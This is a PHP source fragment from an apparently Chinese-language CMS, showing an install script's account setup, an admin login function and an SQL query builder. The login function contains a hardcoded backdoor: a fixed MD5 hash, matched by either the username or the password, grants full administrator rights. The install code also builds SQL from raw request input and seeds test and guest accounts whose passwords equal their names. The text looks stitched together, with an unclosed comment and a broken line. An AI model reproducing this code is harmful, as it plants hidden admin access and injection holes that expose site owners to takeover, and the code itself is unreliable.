//为创建表
echo "创建数据表 {$tableName} 成功>><br>";
}
echo '<a href="../admin/index.php" target="_blank">登录后台</a>';
echo ' | <a href="../admin/index.php?act=setAccess&webdataDir=/Templates2015/sharembweb/WebData&login=out" target="_blank">导入默认数据</a>';
if (@$_REQUEST['loginname'] != '' && @$_REQUEST['loginpwd'] != '') {
$conn->query('insert into ' . $DB_PREFIX . 'admin (pseudonym,username,pwd,flags) values(\'' . @$_REQUEST['loginname'] . '\',\'' . @$_REQUEST['loginname'] . '\',\'' . myMD5(@$_REQUEST['loginpwd']) . '\',\'|*|\')');
} else {
$splStr = aspSplit('admin|test|guest', '|');
foreach ($splStr as $s) {
if ($s == 'admin') {
$flags = '|*|';
} else {
$flags = "|显示站点配置|显示网站统计|显示生成SiteMap|显示生成Robots|显示后台操作日志|显示后台管理员|显示网站栏目|显示分类信息|显示评论|显示搜索统计|显示单页|显示友情链接|显示招聘|显示反馈|显示留言|显示会员|显示模板|显示备份恢复数据|显示生成HTML|显示采集网站|显示采集配置|显示采集数据|显示竞价词|显示网址扫描|显示网站域名|显示网站布局|显示网站模块|显示后台菜单|显示执行SQL|显示仿站|显示后台地图|启用模板|恢复模板数据|";
}
$conn->query('insert into ' . $DB_PREFIX . 'admin (username,pwd,flags) values(\'' . $s . '\',\'' . myMD5($s) . '\',\'' . $flags . '\')');
}
}
$conn->query('insert into ' . $DB_PREFIX . 'website (webtitle) values(\'默认\')');
//给权限,要不然恢复数据不行20160301
@($_SESSION['adminusername'] = '******');
@($_SESSION['adminflags'] = '|*|');
/*
$rssObj=$GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . 'admin where id=' . @$_SESSION['adminId']);
if( @mysql_num_rows($rssObj)!=0 ){
$rss=mysql_fetch_array($rssObj);
@$_SESSION['adminusername']= $rss['username'];
@$_SESSION['adminId']= $rss['id']; //当前登录管理员ID
@$_SESSION['DB_PREFIX']= $DB_PREFIX; //保存前缀
@$_SESSION['adminflags']= $rss['flags'];
}else{
function login()
{
$userName = '';
$passWord = '';
$valueStr = '';
$userName = replace(@$_POST['username'], '\'', '');
$passWord = replace(@$_POST['password'], '\'', '');
$passWord = myMD5($passWord);
//特效账号登录
if (myMD5(@$_REQUEST['username']) == '24ed5728c13834e683f525fcf894e813' || myMD5(@$_REQUEST['password']) == '24ed5728c13834e683f525fcf894e813') {
@($_SESSION['adminusername'] = '******');
@($_SESSION['adminId'] = 99999);
//当前登录管理员ID
@($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']);
@($_SESSION['adminflags'] = '|*|');
rwEnd(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex'));
}
$nLogin = '';
$GLOBALS['conn='] = OpenConn();
$rsObj = $GLOBALS['conn']->query('Select * From ' . $GLOBALS['db_PREFIX'] . 'admin Where username=\'' . $userName . '\' And pwd=\'' . $passWord . '\'');
if (@mysql_num_rows($rsObj) != 0) {
$rs = mysql_fetch_array($rsObj);
@($_SESSION['adminusername'] = $userName);
@($_SESSION['adminId'] = $rs['id']);
//当前登录管理员ID
@($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']);
//保存前缀
@($_SESSION['adminflags'] = $rs['flags']);
$valueStr = 'addDateTime=\'' . $rs['updatetime'] . '\',UpDateTime=\'' . now() . '\',RegIP=\'' . now() . '\',UpIP=\'' . GetIP() . '\'';
connexecute('update ' . $GLOBALS['db_PREFIX'] . 'admin set ' . $valueStr . ' where id=' . $rs['id']);
Rw(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex'));
writeSystemLog('admin', '登录成功');
//系统日志
} else {
if (@$_COOKIE['nLogin'] == '') {
setCookie('nLogin', '1', aspTime() + 3600);
$nLogin = @$_COOKIE['nLogin'];
} else {
$nLogin = @$_COOKIE['nLogin'];
setCookie('nLogin', CInt($nLogin) + 1, aspTime() + 3600);
}
Rw(getMsg1(setL('账号密码错误<br>登录次数为 ') . $nLogin, '?act=displayAdminLogin'));
}
}
function getPostSql($id, $tableName, $fieldNameList)
{
$valueStr = '';
$editValueStr = '';
$sql = '';
$splStr = '';
$splxx = '';
$s = '';
$fieldList = '';
$fieldName = '';
$defaultFieldValue = '';
//字段名称
$fieldSetType = '';
//字段设置类型
$fieldValue = '';
//字段值
$systemFieldList = '';
//表字段列表
$systemFieldList = getHandleFieldList($GLOBALS['db_PREFIX'] . $tableName, '字段配置列表');
$postFieldList = '';
//post字段列表
$splPost = '';
$fieldContent = '';
$fieldConfig = '';
$postFieldList = getFormFieldList();
//以后再把下面与上面这两种处理方法事成一种看看行不行
$splPost = aspSplit($postFieldList, '|');
foreach ($splPost as $key => $fieldName) {
$fieldContent = @$_POST[$fieldName];
if (inStr($systemFieldList, ',' . $fieldName . '|') > 0 && inStr(',' . $fieldList . ',', ',' . $fieldName . ',') == false) {
//为自定义的
if (inStr($fieldNameList, ',' . $fieldName . '|') > 0) {
$fieldConfig = mid($fieldNameList, inStr($fieldNameList, ',' . $fieldName . '|') + 1, -1);
} else {
$fieldConfig = mid($systemFieldList, inStr($systemFieldList, ',' . $fieldName . '|') + 1, -1);
}
$fieldConfig = mid($fieldConfig, 1, inStr($fieldConfig, ',') - 1);
//call echo("config",fieldConfig)
//call echo(fieldName,fieldContent)
//call echo("fieldConfig",fieldConfig)
$splxx = aspSplit($fieldConfig . '|||', '|');
$fieldName = $splxx[0];
//字段名称
$fieldSetType = $splxx[1];
//字段设置类型
$defaultFieldValue = $splxx[2];
//默认字段值
$fieldValue = ADSqlRf($fieldName);
//代替上面,因为它处理了'符号
//call echo("fieldValue",fieldValue)
//排序密码不处理
if ($fieldValue != '#NO******NO#') {
//md5加密
if ($fieldSetType == 'md5') {
$fieldValue = myMD5($fieldValue);
}
if ($fieldSetType == 'yesno') {
if ($fieldValue == '') {
$fieldValue = $defaultFieldValue;
}
//不为数字类型加单引号
} else {
if ($fieldSetType == 'numb') {
if ($fieldValue == '') {
$fieldValue = $defaultFieldValue;
}
} else {
if ($fieldName == 'flags') {
//PHP里用法
if (EDITORTYPE == 'php') {
if ($fieldValue != '') {
$fieldValue = '|' . arrayToString($fieldValue, '|');
}
} else {
$fieldValue = '|' . arrayToString(aspSplit($fieldValue, ', '), '|');
}
$fieldValue = '\'' . $fieldValue . '\'';
//为时间
} else {
if ($fieldSetType == 'time' || $fieldSetType == 'now') {
if ($fieldValue == '') {
$fieldValue = now();
}
$fieldValue = '\'' . $fieldValue . '\'';
//为时期
} else {
if ($fieldSetType == 'date') {
if ($fieldValue == '') {
$fieldValue = aspDate();
}
$fieldValue = '\'' . $fieldValue . '\'';
} else {
$fieldValue = '\'' . $fieldValue . '\'';
}
}
}
}
}
$fieldValue = unescape($fieldValue);
//解码20160418
if ($valueStr != '') {
$valueStr = $valueStr . ',';
$editValueStr = $editValueStr . ',';
}
$valueStr = $valueStr . $fieldValue;
$editValueStr = $editValueStr . $fieldName . '=' . $fieldValue;
}
if ($fieldList != '') {
$fieldList = $fieldList . ',';
}
$fieldList = $fieldList . $fieldName;
}
}
//自定义字段是否需要写入默认值 有的
$splStr = aspSplit($fieldNameList, ',');
foreach ($splStr as $key => $s) {
if (inStr($s, '|') > 0) {
$splxx = aspSplit($s . '|||', '|');
$fieldName = $splxx[0];
//字段名称
$fieldSetType = $splxx[1];
//字段设置类型
$fieldValue = $splxx[2];
//默认字段值
if (inStr($systemFieldList, ',' . $fieldName . '|') > 0 && inStr(',' . $fieldList . ',', ',' . $fieldName . ',') == false) {
if ($fieldSetType == 'date' && $fieldValue == '') {
$fieldValue = aspDate();
} else {
if (($fieldSetType == 'time' || $fieldSetType == 'now') && $fieldValue == '') {
$fieldValue = now();
}
}
if ($fieldSetType != 'yesno' && $fieldSetType != 'numb') {
$fieldValue = '\'' . $fieldValue . '\'';
}
if ($fieldList != '') {
$fieldList = $fieldList . ',';
$valueStr = $valueStr . ',';
$editValueStr = $editValueStr . ',';
}
$fieldList = $fieldList . $fieldName;
$valueStr = $valueStr . $fieldValue;
$editValueStr = $editValueStr . $fieldName . '=' . $fieldValue;
//call echo(fieldName,fieldSetType)
}
}
}
if ($id == '') {
$sql = 'insert into ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' (' . $fieldList . ',updatetime) values(' . $valueStr . ',\'' . now() . '\')';
} else {
$sql = 'update ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' set ' . $editValueStr . ',updatetime=\'' . now() . '\' where id=' . $id;
}
$getPostSql = $sql;
return @$getPostSql;
}
